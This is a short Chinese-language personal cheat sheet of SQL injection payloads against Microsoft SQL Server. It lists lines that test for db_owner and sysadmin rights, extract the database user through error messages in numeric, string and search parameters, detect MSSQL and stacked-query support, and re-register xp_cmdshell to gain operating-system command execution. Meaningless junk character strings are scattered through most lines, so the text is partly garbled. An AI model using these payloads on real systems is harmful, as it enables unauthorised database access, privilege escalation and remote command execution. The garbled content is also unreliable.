常用的一些注入命令,方便查询
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢!"m*D PSb&EK"^
//看看是什么权限的 'aA4tf-m0{m7rU)w
and 1=(Select IS_MEMBER(’db_owner’))
And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--
;o!@ Z{0\zK)?
//检测是否有读取某数据库的权限 E:I9f"[#i
and 1= (Select HAS_DBACCESS(’master’)) ZU4N:x&eSA(H
And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 -- 6Fl5AyuW,O
g&c%[O)qT
数字类型 -mgC:qnH$f
and char(124)%2Buser%2Bchar(124)=0 )G]/O&jR HZ
字符类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’
搜索类型
’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’
爆用户名 E'Lg)f/A-K)FE-| L%}
and user>0
’ and user>0 and ’’=’
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- 7o1m-a_8Ns7X.t FRF
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
.Xv'fq/vMsU_6n
检测是不是MSSQL数据库 ,^E3?w!\
and exists (select * from sysobjects);-- ~t _J8S s6g*Zd
+y.Q;P5jCQ3I#p
检测是否支持多行 H5un}do@
;declare @d int;--
恢复 xp_cmdshell e lw,[s ~!m
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--
@:?(N.D9m